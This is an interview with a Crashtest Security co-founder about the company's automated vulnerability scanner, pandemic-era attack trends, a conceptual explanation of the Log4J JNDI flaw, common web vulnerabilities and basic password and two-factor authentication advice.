The global pandemic has pushed many businesses towards digitization with no adequate time to prepare. Employees have switched to remote working and unfortunately, not all companies were capable of implementing strong security solutions to ensure the safety of their network.
As a result, threat actors have started to actively search for various system vulnerabilities to expand their attack vectors. If any of the security gaps are found, hackers can successfully infiltrate malicious programs and cause damage to the company.
Today, we had a chat with the Co-Founder and Managing Director at Crashtest Security, Felix Brombacher, about ways how enterprises can mitigate the risks with an automated vulnerability scanning software.
You can also read about other useful security solutions here.
What was the journey like since your launch back in 2017?
Our journey began at university when René and his fellow students came up with the idea of developing an automated vulnerability scanner as part of a project. Back then, there was no easy-to-use solution available in the market.
Over the last couple of years, we have continuously improved and are better positioned than ever. This improvement is also reflected in the progress of our product and the team’s know-how. We try to release new features in structured intervals and give our customers exactly what they need.
For example, last year, we introduced the Privilege Escalation Scanner. It allows organizations to automate scanning of their web applications and effectively identify vulnerabilities that could lead to hackers gaining complete control.
Can you tell us a little bit about what you do? What makes Crashtest Security stand out?
Our motto is – vulnerability scanner made easy. Crashtest Security aims to make cybersecurity vulnerability scanning accessible to everyone. Yet, our primary focus is on modern development teams and IT managers of small and medium-sized enterprises with SaaS or digitized products. Our scanner identifies and fixes security vulnerabilities with a click of a button.
In addition, we provide professional customer support and offer a detailed knowledge base that allows anyone to run scans without any problems. Best of all, our vulnerability scanner is automated, saving organizations essential resources, such as budget and time.
What types of technology do you use to detect and analyze vulnerabilities?
We primarily use scanners and features that we’ve built by ourselves. In this sense, we try to rely as little as possible on third-party solutions. As a cybersecurity Software as a Service (SaaS) company, we take security on our end very seriously. It’s important that our customers receive the best value for their money.
For example, our cloud-based solution means one does not have to install anything in the network or own servers. All customers need to do is enter the URL they want to scan, and they are ready to go.
Did you notice any new methods used by threat actors arise during the pandemic?
With the pandemic, we saw a rise in digitization, like work-from home policies which naturally led to larger attack surfaces for hackers. Outside the office, there is less protection and deterrence against cyberattacks. So, now employees are more vulnerable to phishing attacks. Thus, threat actors are now acting more aggressively and appearing more frequently.
In June 2020, a report by Swissinfo.ch showed that the number of cyberattacks in April 2020 more than doubled compared to the previous year. This growing number of cyber threats means an expanding market with increasing demand.
Recently, there has been a lot of commotion around the Log4J vulnerability. Could you briefly explain why it is so serious?
When Log4J 2.0 was released, the new function known as the Lookups – used for adding additional data to the log entries – appeared as well. The Java API "JNDI Lookup" (Java Naming and Directory Interface) communicates with a directory service, resolving internal user identifiers into actual user names.
URI is a data type that the LDAP server can return. It references a Java class loaded into memory and executed by the Log4J instance. Improper input validations in the Log4J library result in injecting an arbitrary LDAP server from an untrusted source.
Since developers usually expect data written into logs to be dealt with as a standard text, and software performs regular text validation, no additional input validation is conducted, and any untrusted user input enters the logs.
What web application vulnerabilities do you run into most often?
Based on the different types of applications, we see the following three types of vulnerabilities appear most often:
- Cross-site request forgery (CSRF). It allows attackers to perform actions in an application while the user is logged into it. This type of attack is mainly carried out through the user's browser, but it can be executed through any file as long as the scripting is allowed there. This includes Word and XML documents, RSS feeds, etc.
- SQL injection attack. It inserts SQL queries into client input to access and manage backend databases. These attacks are most common in web applications that rely on dynamic databases but do not have adequate input validation.
It’s important to note that the vulnerabilities in the reports often are not direct attack vectors per se rather than misconfigurations on the web server or in session management.
Would you like to share some tips on how organizations could eliminate these risks?
Our best advice would be to scan for vulnerabilities before every new release or update – whether internally with your security experts or with an automated tool, such as Crashtest Security Suite. The main thing is that experts and software would regularly check web applications and APIs for risks.
In addition, we recommend keeping an eye on security during the development process to save a lot of time and money afterward. This is because fixing vulnerabilities at an early stage is much cheaper. In addition, one should always back up important data.
Companies should also keep up with what, if any, new cybersecurity threats are out there. The best way to do that is to read blogs or websites that provide detailed information about them.
Finally, the rule of using strong passwords and Two-Factor Authentication (2FA) still applies. This increases security, and you can keep a good overview with password management tools.
As for individual users, what security tools would you recommend for personal use?
I would not necessarily recommend specific tools. Instead, I would suggest following certain security rules that can help minimize the risks of attacks. For example, using 2FA makes cracking user passwords much more difficult for hackers. This type of authentication can be set up in different ways. For instance, users can use their email as a second authentication factor or separate applications, like Authy.
It’s also equally important neither to write down your passwords at work, nor to save them in any file on your PC. If you want to keep your passwords in one, safe place, there are applications for this, such as LastPass or KeePass.
It’s worth mentioning that using modest browsers also reduces cybersecurity risks. However, if you want to go one step further, you should also pay attention to which search engine you use. For secure privacy, duckduckgo.com would be a good choice, among others.
And finally, what does the future hold for Crashtest Security?
We will continue to help companies identify and optimally protect themselves against hacker attacks and other cybersecurity threats. For us, this means that we will continue to move forward with product development, saving our customers even more time. Product development and improving our Sales and Marketing teams are major factors helping us establish our product on the market.